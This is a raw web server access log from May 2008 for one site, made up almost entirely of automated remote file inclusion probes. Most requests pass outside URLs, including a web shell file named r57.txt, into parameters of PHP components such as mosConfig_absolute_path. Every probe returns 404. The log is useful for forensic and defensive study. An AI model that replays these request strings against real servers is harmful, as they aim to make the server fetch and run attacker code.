145.100.60.18 - - [11/May/2008:18:21:49 -0700] "GET /logs//citywriter/head.php?path=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:18:22:43 -0700] "GET /logs/access.log//citywriter/head.php?path=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:18:25:17 -0700] "GET /modulesxoopsgalleryupgrade_album.php?GALLERY_BASEDIR=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:18:25:17 -0700] "GET /modulesxoopsgalleryupgrade_album.php?GALLERY_BASEDIR=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:18:26:24 -0700] "GET /logs/access_080324.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:18:26:24 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.17 - - [11/May/2008:18:26:24 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:26:26 -0700] "GET /logs/access_080128.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:18:26:32 -0700] "GET /logs/access_080324.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:18:26:32 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [11/May/2008:18:26:32 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
86.109.96.33 - - [11/May/2008:18:27:44 -0700] "GET /logs/access_080211.log//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:29:52 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:29:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:29:57 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
205.234.213.67 - - [11/May/2008:18:31:17 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
205.234.213.67 - - [11/May/2008:18:33:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:33:40 -0700] "GET /logs/scripts.log/index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:33:41 -0700] "GET /index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:33:41 -0700] "GET /logs/index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:33:54 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:33:55 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:33:55 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:34:44 -0700] "GET /logs/access_080324.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:34:45 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.22.140.17 - - [11/May/2008:18:34:46 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:35:04 -0700] "GET /logs/scripts.log/index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:35:04 -0700] "GET /index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:35:05 -0700] "GET /logs/index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:18:35:40 -0700] "GET /logs/access.log//citywriter/head.php?path=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:18:35:40 -0700] "GET /logs//citywriter/head.php?path=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:18:36:03 -0700] "GET /logs/access_080225.log//citywriter/head.php?path=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:36:37 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:18:37:15 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:18:37:21 -0700] "GET /index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:18:38:13 -0700] "GET /logs/access_080225.log//citywriter/head.php?path=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:18:38:13 -0700] "GET /logs//citywriter/head.php?path=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:18:38:39 -0700] "GET /logs/access.log//citywriter/head.php?path=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:18:39:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:42:08 -0700] "GET /logs/access_080128.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
64.1.215.166 - - [11/May/2008:18:42:23 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:18:45:03 -0700] "GET /logs/access_080127.log//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
193.47.80.138 - - [11/May/2008:18:45:39 -0700] "GET /sitebuilder/images/a_box-158x232.jpg HTTP/1.1" 404 275 "http://www.exalead.com/" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.toulouseangloexchange.com"
72.30.226.173 - - [11/May/2008:18:50:16 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:18:51:31 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:18:51:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:18:51:32 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:18:51:32 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:18:53:11 -0700] "GET /logs/access_080324.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:18:53:11 -0700] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:18:53:11 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:18:54:07 -0700] "GET /logs/access_080317.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:18:55:47 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:18:55:47 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
72.249.16.72 - - [11/May/2008:18:56:02 -0700] "GET /logs/access_080324.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.249.16.72 - - [11/May/2008:18:56:02 -0700] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.249.16.72 - - [11/May/2008:18:56:02 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.249.16.72 - - [11/May/2008:18:56:41 -0700] "GET /logs/access_080317.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:12 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:12 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:12 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:13 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:13 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:14 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:14 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:14 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:18:57:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:02:18 -0700] "GET /logs/access_080225.log//atom.php5?page=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:02:18 -0700] "GET //atom.php5?page=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:02:18 -0700] "GET /logs//atom.php5?page=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:02:34 -0700] "GET /logs/access.log//atom.php5?page=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.178.228.12 - - [11/May/2008:19:05:11 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
193.178.228.12 - - [11/May/2008:19:05:11 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:05:13 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:05:13 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:19:05:40 -0700] "GET /logs/access_080128.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:19:05:40 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:19:05:41 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:05:42 -0700] "GET /logs/access_080128.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:05:42 -0700] "GET /logs/access_080128.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:05:42 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:05:42 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:05:43 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:05:43 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:05:45 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:05:45 -0700] "GET //ashnews.php?pathtoashnews=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:05:46 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.178.228.12 - - [11/May/2008:19:05:49 -0700] "GET /logs/access_080128.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.178.228.12 - - [11/May/2008:19:05:49 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.178.228.12 - - [11/May/2008:19:05:49 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.108.66.83 - - [11/May/2008:19:06:07 -0700] "GET /logs/access_080128.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.83 - - [11/May/2008:19:06:08 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.83 - - [11/May/2008:19:06:08 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:06:17 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.108.66.83 - - [11/May/2008:19:06:23 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.toulouseangloexchange.com"
89.108.66.83 - - [11/May/2008:19:06:24 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.toulouseangloexchange.com"
